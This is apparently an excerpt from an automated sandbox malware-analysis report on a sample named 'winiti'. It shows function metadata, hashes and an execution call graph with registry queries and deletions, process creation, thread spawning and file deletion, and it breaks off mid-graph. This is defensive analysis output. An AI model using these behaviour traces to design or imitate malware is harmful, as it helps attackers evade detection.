                  • Instruction Fuzzy Hash: DBE0EC75F52741D1FF49AB55A84A7D833907BA9B41FC845ADC82E823A1EE3C838BC710
                  Function 000000013F5FB180 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: GetEnabledXStateFeatures$kernel32
                  • API String ID: 2574300362-4273408117
                  • Opcode ID: d9ff822428f1893a5703cac88901d505093234beacf457cec68585e3c479c2ba
                  • Instruction ID: 99b59b43ff176e5fe92114a27f46757ed3c38a8bb89ba236f25a04909d7d87d6
                  • Opcode Fuzzy Hash: d9ff822428f1893a5703cac88901d505093234beacf457cec68585e3c479c2ba
                  • Instruction Fuzzy Hash: CFE0EC38F12741D1FF49AB55A84A7D423A17B89790FCC81ACC81D42350EE2C879BD710
                  Function 000000013F62E8F0 Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: 669846d24bbda5f65c578a588012ee14f3413299c3a7e3c496bd00c502c477b6
                  • Instruction ID: 663b77c825b60f0b5c82d666c2f4c7c30ef37377dda9cf54e758f778ea580627
                  • Opcode Fuzzy Hash: 669846d24bbda5f65c578a588012ee14f3413299c3a7e3c496bd00c502c477b6
                  • Instruction Fuzzy Hash: 9F41D2B6F1065492EFA48B25C0423ED6390E72CF94F18853FDA4A877CADA3CCA438751
                  Function 000000013F611BED Relevance: 6.1, APIs: 4, Instructions: 119threadCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: ea4baac3568b8008df20d653752b465ece59447f5b54120d8eb719c92615070f
                  • Instruction ID: 465538b9affbd538a8e45464ec8dc52e3d811905f7386aeb122890f6daef83d4
                  • Opcode Fuzzy Hash: ea4baac3568b8008df20d653752b465ece59447f5b54120d8eb719c92615070f
                  • Instruction Fuzzy Hash: 1E518EB0F14601CBF7599B6599977E627E8AB40358F1441BDE80AC32E5DB28DF07C601
                  Function 000000013F62F060 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: BreakDebug
                  • String ID:
                  • API String ID: 456121617-0
                  • Opcode ID: 21388db3ff23c23bfe290b02463c8e984ea9257b12978aae731d96e3086609a7
                  • Instruction ID: 31a406dccfed760e91908ea19a42eb100771b3022fa4e2366689652c72cbda00
                  • Opcode Fuzzy Hash: 21388db3ff23c23bfe290b02463c8e984ea9257b12978aae731d96e3086609a7
                  • Instruction Fuzzy Hash: F34104B6B05784A2FA619B11E1167ED7BE8E744B98F59047CDE480739ADF78CA83C340
                  Function 000000013F61D200 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: BreakDebug
                  • String ID:
                  • API String ID: 456121617-0
                  • Opcode ID: a762ba7bdb9e68b543346d8befee5f14f7d2aaaa5ecc6a7732aa10b9ae04d0ef
                  • Instruction ID: 82623d0bb5752d52e1ac37a1cd8bd69f0b27cbb1907cfecb3b6668c9878d1ef2
                  • Opcode Fuzzy Hash: a762ba7bdb9e68b543346d8befee5f14f7d2aaaa5ecc6a7732aa10b9ae04d0ef
                  • Instruction Fuzzy Hash: 0B31AFB2A05B5482EA659F65A2423D9B7E4F785B98F58003CEF590779BDF7CCA42C300
                  Function 000000013F5FAD00 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: ErrorLastMultipleWait$HandlesObjects
                  • String ID:
                  • API String ID: 2817213684-0
                  • Opcode ID: 1b63c40e6d013145cedae492ad8f21b5e2360a6dd9ad6664cb5addbe83128acf
                  • Instruction ID: 0ec6867dbc8c4a8328232f602fcc174e7fc0c101e07bfd2042285085f249ec6e
                  • Opcode Fuzzy Hash: 1b63c40e6d013145cedae492ad8f21b5e2360a6dd9ad6664cb5addbe83128acf
                  • Instruction Fuzzy Hash: FB11C435B08B54C3E7248B1AF40535AB7A1F784B95F54013DEAD987BA9CB3CCA458B40
                  Function 000000013F65955C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                  • String ID:
                  • API String ID: 2933794660-0
                  • Opcode ID: efb2c1910f7fe4eb1fdb9db6ef462f9c960acadc62b879df81811dfe8f91f112
                  • Instruction ID: a6431462b84827648b4ed0d6a9348ea0b0a9eef2aa01d6a08f2bd176101f508a
                  • Opcode Fuzzy Hash: efb2c1910f7fe4eb1fdb9db6ef462f9c960acadc62b879df81811dfe8f91f112
                  • Instruction Fuzzy Hash: BD110C36B11F04CAEB00CF64E8593E837A4F759B98F441E39DA6D86BA8DF78C2558340
                  Function 000000013F65A8E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,000000013F659A6B), ref: 000000013F65A930
                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000000013F659A6B), ref: 000000013F65A971
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFileHeaderRaise
                  • String ID: csm
                  • API String ID: 2573137834-1018135373
                  • Opcode ID: aa4e29ff740041cbb66bd2c147c1e0abea6c0f4e7f03852bd6b62dcdd7bd4198
                  • Instruction ID: f290f5f0022c1b605dbbdbf036a7bb581224f7429d8ab29e80b764996635656c
                  • Opcode Fuzzy Hash: aa4e29ff740041cbb66bd2c147c1e0abea6c0f4e7f03852bd6b62dcdd7bd4198
                  • Instruction Fuzzy Hash: C9116D32614B8082EB208F15F8443997BE4F788B94F194224DEDC47B69DF3CC6528B00
                  Function 000000013F613E10 Relevance: 5.1, APIs: 4, Instructions: 53COMMON
                  Download Yara Rule
                  APIs
                  • EnterCriticalSection.KERNEL32(?,?,00000000,000000013F613F8F,?,?,?,000000013F62025A), ref: 000000013F613E5A
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,000000013F613F8F,?,?,?,000000013F62025A), ref: 000000013F613E9C
                  • EnterCriticalSection.KERNEL32(?,?,00000000,000000013F613F8F,?,?,?,000000013F62025A), ref: 000000013F613EC7
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,000000013F613F8F,?,?,?,000000013F62025A), ref: 000000013F613EE8
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 76d884de7bf17c7811e84ddf0ad67568b996faf9851ca8ebb35a4ad0458fe3ff
                  • Instruction ID: f64eefb5bd9f523e8549be03835d48176e99c8d604bca3b150ca429985d4114e
                  • Opcode Fuzzy Hash: 76d884de7bf17c7811e84ddf0ad67568b996faf9851ca8ebb35a4ad0458fe3ff
                  • Instruction Fuzzy Hash: E6210CB1A10A05C2EF589F24E9CA3D527B4FB547A0F98127AD56D426E9DB38C69BC300

                  Execution Graph

                  Execution Coverage:1.7%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:2.7%
                  Total number of Nodes:728
                  Total number of Limit Nodes:10
                  execution_graph 47095 434887 47096 434893 ___DestructExceptionObject 47095->47096 47121 434596 47096->47121 47098 43489a 47100 4348c3 47098->47100 47424 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 47098->47424 47109 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47100->47109 47132 444251 47100->47132 47104 4348e2 ___DestructExceptionObject 47105 434962 47140 434b14 47105->47140 47109->47105 47425 4433e7 35 API calls 4 library calls 47109->47425 47116 43498e 47118 434997 47116->47118 47426 4433c2 28 API calls _Atexit 47116->47426 47427 43470d 13 API calls 2 library calls 47118->47427 47122 43459f 47121->47122 47428 434c52 IsProcessorFeaturePresent 47122->47428 47124 4345ab 47429 438f31 47124->47429 47126 4345b0 47127 4345b4 47126->47127 47438 4440bf 47126->47438 47127->47098 47130 4345cb 47130->47098 47133 444268 47132->47133 47134 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47133->47134 47135 4348dc 47134->47135 47135->47104 47136 4441f5 47135->47136 47137 444224 47136->47137 47138 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47137->47138 47139 44424d 47138->47139 47139->47109 47546 436e90 47140->47546 47142 434b27 GetStartupInfoW 47143 434968 47142->47143 47144 4441a2 47143->47144 47548 44f059 47144->47548 47146 4441ab 47147 434971 47146->47147 47552 446815 35 API calls 47146->47552 47149 40e9c5 47147->47149 47735 41cb50 LoadLibraryA GetProcAddress 47149->47735 47151 40e9e1 GetModuleFileNameW 47740 40f3c3 47151->47740 47153 40e9fd 47755 4020f6 47153->47755 47156 4020f6 28 API calls 47157 40ea1b 47156->47157 47761 41be1b 47157->47761 47161 40ea2d 47787 401e8d 47161->47787 47163 40ea36 47164 40ea93 47163->47164 47165 40ea49 47163->47165 47793 401e65 22 API calls 47164->47793 47817 40fbb3 116 API calls 47165->47817 47168 40ea5b 47818 401e65 22 API calls 47168->47818 47169 40eaa3 47794 401e65 22 API calls 47169->47794 47171 40ea67 47819 410f37 36 API calls __EH_prolog 47171->47819 47173 40eac2 47795 40531e 28 API calls 47173->47795 47176 40ead1 47796 406383 28 API calls 47176->47796 47177 40ea79 47820 40fb64 77 API calls 47177->47820 47180 40eadd 47797 401fe2 47180->47797 47181 40ea82 47821 40f3b0 70 API calls 47181->47821 47187 401fd8 11 API calls 47189 40eefb 47187->47189 47188 401fd8 11 API calls 47190 40eafb 47188->47190 47419 4432f6 GetModuleHandleW 47189->47419 47809 401e65 22 API calls 47190->47809 47192 40eb04 47810 401fc0 28 API calls 47192->47810 47194 40eb0f 47811 401e65 22 API calls 47194->47811 47196 40eb28 47812 401e65 22 API calls 47196->47812 47198 40eb43 47199 40ebae 47198->47199 47822 406c1e 28 API calls 47198->47822 47813 401e65 22 API calls 47199->47813 47202 40eb70 47203 401fe2 28 API calls 47202->47203 47204 40eb7c 47203->47204 47205 401fd8 11 API calls 47204->47205 47208 40eb85 47205->47208 47206 40ec02 47814 40d069 47206->47814 47207 40ebbb 47207->47206 47824 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 47207->47824 47823 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 47208->47823 47210 40ec08 47211 40ea8b 47210->47211 47826 41b2c3 33 API calls 47210->47826 47211->47187 47214 40eba4 47214->47199 47216 40f34f 47214->47216 47909 4139a9 30 API calls 47216->47909 47217 40ec23 47220 40ec76 47217->47220 47827 407716 RegOpenKeyExA RegQueryValueExA RegCloseKey 47217->47827 47218 40ebe6 47218->47206 47825 4139a9 30 API calls 47218->47825 47832 401e65 22 API calls 47220->47832 47224 40ec7f 47232 40ec90 47224->47232 47233 40ec8b 47224->47233 47225 40ec3e 47227 40ec42 47225->47227 47228 40ec4c 47225->47228 47226 40f365 47910 412475 65 API calls ___scrt_fastfail 47226->47910 47828 407738 30 API calls 47227->47828 47830 401e65 22 API calls 47228->47830 47834 401e65 22 API calls 47232->47834 47833 407755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47233->47833 47234 40ec47 47829 407260 97 API calls 47234->47829 47239 40f37f 47912 413a23 RegOpenKeyExW RegDeleteValueW 47239->47912 47240 40ec99 47835 41bc5e 28 API calls 47240->47835 47242 40ec55 47242->47220 47245 40ec71 47242->47245 47244 40eca4 47836 401f13 28 API calls 47244->47836 47831 407260 97 API calls 47245->47831 47246 40f392 47913 401f09 11 API calls 47246->47913 47248 40ecaf 47837 401f09 11 API calls 47248->47837 47252 40f39c 47914 401f09 11 API calls 47252->47914 47253 40ecb8 47838 401e65 22 API calls 47253->47838 47256 40f3a5 47915 40dd42 27 API calls 47256->47915 47257 40ecc1 47839 401e65 22 API calls 47257->47839 47259 40f3aa 47916 414f2a 167 API calls _strftime 47259->47916 47263 40ecdb 47840 401e65 22 API calls 47263->47840 47265 40ecf5 47841 401e65 22 API calls 47265->47841 47267 40ed80 47270 40ed8a 47267->47270 47276 40ef06 ___scrt_fastfail 47267->47276 47268 40ed0e 47268->47267 47842 401e65 22 API calls 47268->47842 47271 40ed93 47270->47271 47278 40ee0f 47270->47278 47848 401e65 22 API calls 47271->47848 47273 40ed9c 47849 401e65 22 API calls 47273->47849 47274 40ed23 _wcslen 47274->47267 47843 401e65 22 API calls 47274->47843 47859 4136f8 RegOpenKeyExA RegQueryValueExA RegCloseKey 47276->47859 47277 40edae 47850 401e65 22 API calls 47277->47850 47301 40ee0a ___scrt_fastfail 47278->47301 47280 40ed3e 47844 401e65 22 API calls 47280->47844 47283 40edc0 47851 401e65 22 API calls 47283->47851 47285 40ed53 47845 40da34 31 API calls 47285->47845 47286 40ef51 47860 401e65 22 API calls 47286->47860 47290 40ede9 47852 401e65 22 API calls 47290->47852 47291 40ef76 47861 402093 28 API calls 47291->47861 47292 40ed66 47846 401f13 28 API calls 47292->47846 47295 40ed72 47847 401f09 11 API calls 47295->47847 47297 40ef88 47862 41376f 14 API calls 47297->47862 47299 40edfa 47853 40cdf9 45 API calls _wcslen 47299->47853 47300 40ed7b 47300->47267 47301->47278 47854 413947 31 API calls 47301->47854 47305 40ef9e 47863 401e65 22 API calls 47305->47863 47306 40eea3 ctype 47855 401e65 22 API calls 47306->47855 47308 40efaa 47864 43baac 39 API calls _strftime 47308->47864 47311 40efb7 47313 40efe4 47311->47313 47865 41cd9b 86 API calls ___scrt_fastfail 47311->47865 47312 40eeba 47312->47286 47856 401e65 22 API calls 47312->47856 47866 402093 28 API calls 47313->47866 47315 40eed7 47857 41bc5e 28 API calls 47315->47857 47319 40efc8 CreateThread 47319->47313 48008 41d45d 10 API calls 47319->48008 47320 40eff9 47867 402093 28 API calls 47320->47867 47321 40eee3 47858 40f474 103 API calls 47321->47858 47324 40f008 47868 41b4ef 79 API calls 47324->47868 47325 40eee8 47325->47286 47327 40eeef 47325->47327 47327->47211 47328 40f00d 47869 401e65 22 API calls 47328->47869 47330 40f019 47870 401e65 22 API calls 47330->47870 47332 40f02b 47871 401e65 22 API calls 47332->47871 47334 40f04b 47872 43baac 39 API calls _strftime 47334->47872 47336 40f058 47873 401e65 22 API calls 47336->47873 47338 40f063 47874 401e65 22 API calls 47338->47874 47340 40f074 47875 401e65 22 API calls 47340->47875 47342 40f089 47876 401e65 22 API calls 47342->47876 47344 40f09a 47345 40f0a1 StrToIntA 47344->47345 47877 409de4 169 API calls _wcslen 47345->47877 47347 40f0b3 47878 401e65 22 API calls 47347->47878 47349 40f101 47887 401e65 22 API calls 47349->47887 47350 40f0bc 47350->47349 47879 4344ea 47350->47879 47355 40f0e4 47356 40f0eb CreateThread 47355->47356 47356->47349 48009 419fb4 102 API calls 2 library calls 47356->48009 47357 40f159 47889 401e65 22 API calls 47357->47889 47358 40f111 47358->47357 47360 4344ea new 22 API calls 47358->47360 47361 40f126 47360->47361 47888 401e65 22 API calls 47361->47888 47363 40f138 47366 40f13f CreateThread 47363->47366 47364 40f1cc 47895 401e65 22 API calls 47364->47895 47365 40f162 47365->47364 47890 401e65 22 API calls 47365->47890 47366->47357 48007 419fb4 102 API calls 2 library calls 47366->48007 47369 40f17e 47891 401e65 22 API calls 47369->47891 47370 40f1d5 47371 40f21a 47370->47371 47896 401e65 22 API calls 47370->47896 47900 41b60d 79 API calls 47371->47900 47375 40f193 47892 40d9e8 31 API calls 47375->47892 47376 40f223 47901 401f13 28 API calls 47376->47901 47377 40f1ea 47897 401e65 22 API calls 47377->47897 47380 40f22e 47902 401f09 11 API calls 47380->47902 47382 40f1a6 47893 401f13 28 API calls 47382->47893 47384 40f1ff 47898 43baac 39 API calls _strftime 47384->47898 47386 40f237 CreateThread 47389 40f264 47386->47389 47390 40f258 CreateThread 47386->47390 48010 40f7a7 120 API calls 47386->48010 47387 40f1b2 47894 401f09 11 API calls 47387->47894 47392 40f279 47389->47392 47393 40f26d CreateThread 47389->47393 47390->47389 48011 4120f7 137 API calls 47390->48011 47397 40f2cc 47392->47397 47903 402093 28 API calls 47392->47903 47393->47392 48005 4126db 38 API calls ___scrt_fastfail 47393->48005 47395 40f1bb CreateThread 47395->47364 48006 401be9 49 API calls _strftime 47395->48006 47396 40f20c 47899 40c162 7 API calls 47396->47899 47905 4134ff RegOpenKeyExA RegQueryValueExA RegCloseKey 47397->47905 47400 40f29c 47904 4052fd 28 API calls 47400->47904 47403 40f2e4 47403->47256 47906 41bc5e 28 API calls 47403->47906 47408 40f2fd 47907 41361b 31 API calls 47408->47907 47413 40f313 47908 401f09 11 API calls 47413->47908 47415 40f346 DeleteFileW 47416 40f34d 47415->47416 47417 40f31e 47415->47417 47911 41bc5e 28 API calls 47416->47911 47417->47415 47417->47416 47418 40f334 Sleep 47417->47418 47418->47417 47420 434984 47419->47420 47420->47116 47421 44341f 47420->47421 48013 44319c 47421->48013 47424->47098 47425->47105 47426->47118 47427->47104 47428->47124 47430 438f36 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 47429->47430 47442 43a43a 47430->47442 47434 438f4c 47435 438f57 47434->47435 47456 43a476 DeleteCriticalSection 47434->47456 47435->47126 47437 438f44 47437->47126 47484 44fb68 47438->47484 47441 438f5a 8 API calls 3 library calls 47441->47127 47443 43a443 47442->47443 47445 43a46c 47443->47445 47446 438f40 47443->47446 47457 438e7f 47443->47457 47462 43a476 DeleteCriticalSection 47445->47462 47446->47437 47448 43a3ec 47446->47448 47477 438d94 47448->47477 47450 43a3f6 47451 43a401 47450->47451 47482 438e42 6 API calls try_get_function 47450->47482 47451->47434 47453 43a40f 47454 43a41c 47453->47454 47483 43a41f 6 API calls ___vcrt_FlsFree 47453->47483 47454->47434 47456->47437 47463 438c73 47457->47463 47460 438eb6 InitializeCriticalSectionAndSpinCount 47461 438ea2 47460->47461 47461->47443 47462->47446 47464 438ca7 47463->47464 47467 438ca3 47463->47467 47464->47460 47464->47461 47466 438cd3 GetProcAddress 47468 438ce3 __crt_fast_encode_pointer 47466->47468 47467->47464 47469 438cc7 47467->47469 47470 438d13 47467->47470 47468->47464 47469->47464 47469->47466 47471 438d3b LoadLibraryExW 47470->47471 47476 438d30 47470->47476 47472 438d57 GetLastError 47471->47472 47473 438d6f 47471->47473 47472->47473 47474 438d62 LoadLibraryExW 47472->47474 47475 438d86 FreeLibrary 47473->47475 47473->47476 47474->47473 47475->47476 47476->47467 47478 438c73 try_get_function 5 API calls 47477->47478 47479 438dae 47478->47479 47480 438dc6 TlsAlloc 47479->47480 47481 438db7 47479->47481 47481->47450 47482->47453 47483->47451 47485 44fb85 47484->47485 47486 44fb81 47484->47486 47485->47486 47490 449ca6 47485->47490 47502 434fcb 47486->47502 47488 4345bd 47488->47130 47488->47441 47491 449cb2 ___DestructExceptionObject 47490->47491 47509 445888 EnterCriticalSection 47491->47509 47493 449cb9 47510 450183 47493->47510 47495 449cc8 47501 449cd7 47495->47501 47521 449b3a 23 API calls 47495->47521 47498 449cd2 47522 449bf0 GetStdHandle GetFileType 47498->47522 47500 449ce8 ___DestructExceptionObject 47500->47485 47523 449cf3 LeaveCriticalSection std::_Lockit::~_Lockit 47501->47523 47503 434fd6 IsProcessorFeaturePresent 47502->47503 47504 434fd4 47502->47504 47506 435018 47503->47506 47504->47488 47545 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47506->47545 47508 4350fb 47508->47488 47509->47493 47511 45018f ___DestructExceptionObject 47510->47511 47512 4501b3 47511->47512 47513 45019c 47511->47513 47524 445888 EnterCriticalSection 47512->47524 47532 4405dd 20 API calls _Atexit 47513->47532 47516 4501bf 47520 4501eb 47516->47520 47525 4500d4 47516->47525 47518 4501a1 ___DestructExceptionObject _Atexit 47518->47495 47533 450212 LeaveCriticalSection std::_Lockit::~_Lockit 47520->47533 47521->47498 47522->47501 47523->47500 47524->47516 47534 445af3 47525->47534 47527 4500f3 47542 446782 20 API calls __dosmaperr 47527->47542 47530 450145 47530->47516 47531 4500e6 47531->47527 47541 448a84 11 API calls 2 library calls 47531->47541 47532->47518 47533->47518 47539 445b00 ___crtLCMapStringA 47534->47539 47535 445b40 47544 4405dd 20 API calls _Atexit 47535->47544 47536 445b2b RtlAllocateHeap 47537 445b3e 47536->47537 47536->47539 47537->47531 47539->47535 47539->47536 47543 442f80 7 API calls 2 library calls 47539->47543 47541->47531 47542->47530 47543->47539 47544->47537 47545->47508 47547 436ea7 47546->47547 47547->47142 47547->47547 47549 44f06b 47548->47549 47550 44f062 47548->47550 47549->47146 47553 44ef58 47550->47553 47552->47146 47573 448215 GetLastError 47553->47573 47555 44ef65 47593 44f077 47555->47593 47557 44ef6d 47602 44ecec 47557->47602 47560 44ef84 47560->47549 47566 44efc2 47626 4405dd 20 API calls _Atexit 47566->47626 47568 44efc7 47627 446782 20 API calls __dosmaperr 47568->47627 47569 44efdf 47570 44f00b 47569->47570 47628 446782 20 API calls __dosmaperr 47569->47628 47570->47568 47629 44ebc2 20 API calls 47570->47629 47574 448231 47573->47574 47575 44822b 47573->47575 47577 445af3 __Getctype 20 API calls 47574->47577 47579 448280 SetLastError 47574->47579 47630 4487bc 11 API calls 2 library calls 47575->47630 47578 448243 47577->47578 47580 